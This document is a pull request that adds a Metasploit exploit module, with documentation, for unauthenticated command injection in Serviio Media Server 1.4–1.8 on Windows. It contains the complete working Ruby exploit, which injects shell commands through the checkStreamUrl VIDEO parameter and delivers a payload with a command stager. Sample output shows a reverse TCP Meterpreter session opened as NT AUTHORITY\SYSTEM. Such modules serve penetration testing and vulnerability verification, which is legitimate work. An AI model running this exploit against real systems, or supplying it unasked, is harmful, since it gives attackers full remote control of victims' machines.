### PR TITLE
Add Serviio Media Server checkStreamUrl Command Execution

### DIFF
--- a/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md
+++ b/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md
@@ -1,0 +1,71 @@
+## Description
+
+  This module exploits an unauthenticated remote command execution vulnerability in the console component of [Serviio Media Server](http://serviio.org/) versions 1.4 to 1.8 on Windows operating systems.
+
+  The console service (on port 23423 by default) exposes a REST API which which does not require authentication.
+
+  The 'action' API endpoint does not sufficiently sanitize user-supplied data in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is used in a call to cmd.exe resulting in execution of arbitrary commands.
+
+## Vulnerable Application
+
+  Serviio is a free media server. It allows you to stream your media files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, games console or mobile phone) on your connected home network.
+
+  Serviio is based on Java technology and therefore runs on most platforms, including Windows, Mac and Linux (incl. embedded systems, e.g. NAS).
+
+  This module has been tested successfully on Serviio Media Server versions 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.
+
+  Installers:
+
+  * [serviio-1.8-win-setup.exe](http://download.serviio.org/releases/serviio-1.8-win-setup.exe)
+  * [serviio-1.7-win-setup.exe](http://download.serviio.org/releases/serviio-1.7-win-setup.exe)
+  * [serviio-1.6-win-setup.exe](http://download.serviio.org/releases/serviio-1.6-win-setup.exe)
+  * [serviio-1.5-win-setup.exe](http://download.serviio.org/releases/serviio-1.5-win-setup.exe)
+  * [serviio-1.4-win-setup.exe](http://download.serviio.org/releases/serviio-1.4-win-setup.exe)
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/windows/http/serviio_checkstreamurl_cmd_exec`
+  3. Do: `set rhost [IP]`
+  4. Do: `run`
+  5. You should get a session
+
+## Sample Output
+
+  ```
+  msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec 
+  msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166
+  rhost => 172.16.191.166
+  msf exploit(serviio_checkstreamurl_cmd_exec) > check
+  [*] 172.16.191.166:23423 The target appears to be vulnerable.
+  msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true
+  verbose => true
+  msf exploit(serviio_checkstreamurl_cmd_exec) > check
+
+  [*] 172.16.191.166:23423 Serviio Media Server version 1.8
+  [*] 172.16.191.166:23423 The target appears to be vulnerable.
+  msf exploit(serviio_checkstreamurl_cmd_exec) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [*] Serviio Media Server version 1.8
+  [*] Command Stager progress -   7.95% done (7999/100636 bytes)
+  [*] Command Stager progress -  15.90% done (15998/100636 bytes)
+  [*] Command Stager progress -  23.85% done (23997/100636 bytes)
+  [*] Command Stager progress -  31.79% done (31996/100636 bytes)
+  [*] Command Stager progress -  39.74% done (39995/100636 bytes)
+  [*] Command Stager progress -  47.69% done (47994/100636 bytes)
+  [*] Command Stager progress -  55.64% done (55993/100636 bytes)
+  [*] Command Stager progress -  63.59% done (63992/100636 bytes)
+  [*] Command Stager progress -  71.54% done (71991/100636 bytes)
+  [*] Command Stager progress -  79.48% done (79990/100636 bytes)
+  [*] Command Stager progress -  87.43% done (87989/100636 bytes)
+  [*] Command Stager progress -  95.38% done (95988/100636 bytes)
+  [*] Sending stage (957487 bytes) to 172.16.191.166
+  [*] Command Stager progress - 100.00% done (100636/100636 bytes)
+  [*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > pwd 
+  C:\Program Files\Serviio\bin
+  ```

--- a/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb
+++ b/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb
@@ -1,0 +1,101 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  HttpFingerprint = { :pattern => [ /Restlet-Framework/ ] }
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Serviio Media Server checkStreamUrl Command Execution',
+      'Description'    => %q{
+        This module exploits an unauthenticated remote command execution vulnerability
+        in the console component of Serviio Media Server versions 1.4 to 1.8 on
+        Windows operating systems.
+
+        The console service (on port 23423 by default) exposes a REST API which
+        which does not require authentication.
+
+        The 'action' API endpoint does not sufficiently sanitize user-supplied data
+        in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is
+        used in a call to cmd.exe resulting in execution of arbitrary commands.
+
+        This module has been tested successfully on Serviio Media Server versions
+        1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>', # Discovery and exploit
+          'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
+        ],
+      'References'     =>
+        [
+          ['OSVDB', '41961'],
+          ['PACKETSTORM', '142387'],
+          ['URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php'],
+          ['URL', 'https://blogs.securiteam.com/index.php/archives/3094']
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['Automatic Targeting', { 'auto' => true }]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'May 3 2017',
+      'DefaultTarget'  => 0))
+    register_options([ Opt::RPORT(23423) ])
+  end
+
+  def check
+    res = execute_command('')
+
+    unless res
+      vprint_status 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    if res.headers['Server'] !~ /Serviio/
+      vprint_status 'Target is not a Serviio Media Server'
+      return CheckCode::Safe
+    end
+
+    if res.headers['Server'] !~ /Windows/
+      vprint_status 'Target operating system is not vulnerable'
+      return CheckCode::Safe
+    end
+
+    if res.code != 200 || res.body !~ %r{<errorCode>603</errorCode>}
+      vprint_status 'Unexpected reply'
+      return CheckCode::Safe
+    end
+
+    if res.headers['Server'] =~ %r{Serviio/(1\.[4-8])}
+      vprint_status "#{peer} Serviio Media Server version #{$1}"
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, opts = {})
+    json = { 'name'      => 'checkStreamUrl',
+             'parameter' => ['VIDEO', "\" &#{cmd}&"] }.to_json
+
+    send_request_cgi('uri'    => normalize_uri(target_uri.path, 'rest', 'action'),
+                     'method' => 'POST',
+                     'ctype'  => 'application/json',
+                     'data'   => json)
+  end
+
+  def exploit
+    fail_with(Failure::NoTarget, 'Target is not vulnerable') unless check == CheckCode::Appears
+    execute_cmdstager(:temp => '.', :linemax => 8000)
+  end
+end

--- a/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb
+++ b/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    fail_with(Failure::NoTarget, 'Target is not vulnerable') unless check == CheckCode::Appears
+    fail_with(Failure::NotVulnerable, 'Target is not vulnerable') unless check == CheckCode::Appears
     execute_cmdstager(:temp => '.', :linemax => 8000)
   end
 end

--- a/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb
+++ b/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb
@@ -85,13 +85,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, opts = {})
-    json = { 'name'      => 'checkStreamUrl',
-             'parameter' => ['VIDEO', "\" &#{cmd}&"] }.to_json
-
+    data = { 'name' => 'checkStreamUrl', 'parameter' => ['VIDEO', "\" &#{cmd}&"] }
     send_request_cgi('uri'    => normalize_uri(target_uri.path, 'rest', 'action'),
                      'method' => 'POST',
                      'ctype'  => 'application/json',
-                     'data'   => json)
+                     'data'   => data.to_json)
   end
 
   def exploit


### PR DESCRIPTION
This PR adds an exploit module for Serviio Media Server.

This module exploits an unauthenticated remote command execution vulnerability
in the console component of [Serviio Media Server](http://serviio.org/download) versions 1.4 to 1.8 on
Windows operating systems.

The console service (on port 23423 by default) exposes a REST API which
which does not require authentication.

The 'action' API endpoint does not sufficiently sanitize user-supplied data
in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is
used in a call to cmd.exe resulting in execution of arbitrary commands.

This module has been tested successfully on Serviio Media Server versions
1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.

### Documentation

To follow; when I feel like it.

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/windows/http/serviio_checkstreamurl_cmd_exec`
- [x] `check`
- [x] **Verify** the check method returns `Unknown` if the connection to the target server fails.
- [x] **Verify** the check method returns `Appears` if the target server is Serviio version 1.4 to 1.8 on Windows.
- [x] **Verify** the check method returns `Safe` if the target server is not Serviio version 1.4 to 1.8 on Windows.
- [x] `run`
- [x] **Verify** you get a shell.


### Output

```msf
msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec 
msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true
verbose => true
msf exploit(serviio_checkstreamurl_cmd_exec) > check

[*] 172.16.191.166:23423 Serviio Media Server version 1.8
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] Serviio Media Server version 1.8
[*] Command Stager progress -   7.95% done (7999/100636 bytes)
[*] Command Stager progress -  15.90% done (15998/100636 bytes)
[*] Command Stager progress -  23.85% done (23997/100636 bytes)
[*] Command Stager progress -  31.79% done (31996/100636 bytes)
[*] Command Stager progress -  39.74% done (39995/100636 bytes)
[*] Command Stager progress -  47.69% done (47994/100636 bytes)
[*] Command Stager progress -  55.64% done (55993/100636 bytes)
[*] Command Stager progress -  63.59% done (63992/100636 bytes)
[*] Command Stager progress -  71.54% done (71991/100636 bytes)
[*] Command Stager progress -  79.48% done (79990/100636 bytes)
[*] Command Stager progress -  87.43% done (87989/100636 bytes)
[*] Command Stager progress -  95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 172.16.191.166
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd 
C:\Program Files\Serviio\bin
```
